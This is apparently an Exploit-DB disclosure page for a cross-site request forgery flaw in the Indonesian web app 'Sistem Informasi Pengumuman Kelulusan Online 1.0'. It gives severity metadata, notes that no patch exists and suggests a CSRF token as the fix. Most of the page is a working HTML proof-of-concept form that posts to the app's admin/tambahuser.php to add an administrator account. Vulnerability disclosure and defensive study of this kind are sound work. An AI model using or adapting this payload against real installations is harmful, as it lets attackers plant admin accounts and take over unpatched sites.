Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)

vendor:

Sistem Informasi Pengumuman Kelulusan Online 1.0

by:

Extinction

8.8

CVSS

HIGH

Cross-Site Request Forgery (Add Admin)

352

CWE

Product Name: Sistem Informasi Pengumuman Kelulusan Online 1.0

Affected Version From: latest

Affected Version To: latest

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux,windows,macOS

2020

Sistem Informasi Pengumuman Kelulusan Online 1.0 – Cross-Site Request Forgery (Add Admin)

CSRF vulnerability was discovered in Sistem kelulusan. With this vulnerability, authorized users can be added to the system.

Mitigation:

Implementing a CSRF token in the application can help mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 2020-06-10
# Exploit Author: Extinction
# Vendor Homepage: https://adikiss.net/
# Software Link: https://adikiss.net/2014/06/aplikasi-sistem-informasi-pengumuman-kelulusan-online-2/
# Version: latest
# Tested on: Linux,windows,macOS

# Description SpearSecurity :
# CSRF vulnerability was discovered in Sistem kelulusan.
# With this vulnerability, authorized users can be added to the system.

POC:

<html>
<body>
<center>
<hr>
<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
<input type="text" class="form-control" name="nama"
placeholder="Username" size="35">
<br>
<input type="text" class="form-control" name="username"
placeholder="Spear" size="35">
<br>
<input type="text" class="form-control" name="pass"
placeholder="Security" size="35">
<br>
<br>
<input type="submit" name="submit" id="submit" value="Simpan Data"
class="btn btn-primary" onclick="tb_remove()">
</form>
<hr>
<h1> CODED BY SPEAR-SECURITY </h1>
<h2> Author Extinction </h2>
</body>
</html>

#SpearSecurity-ID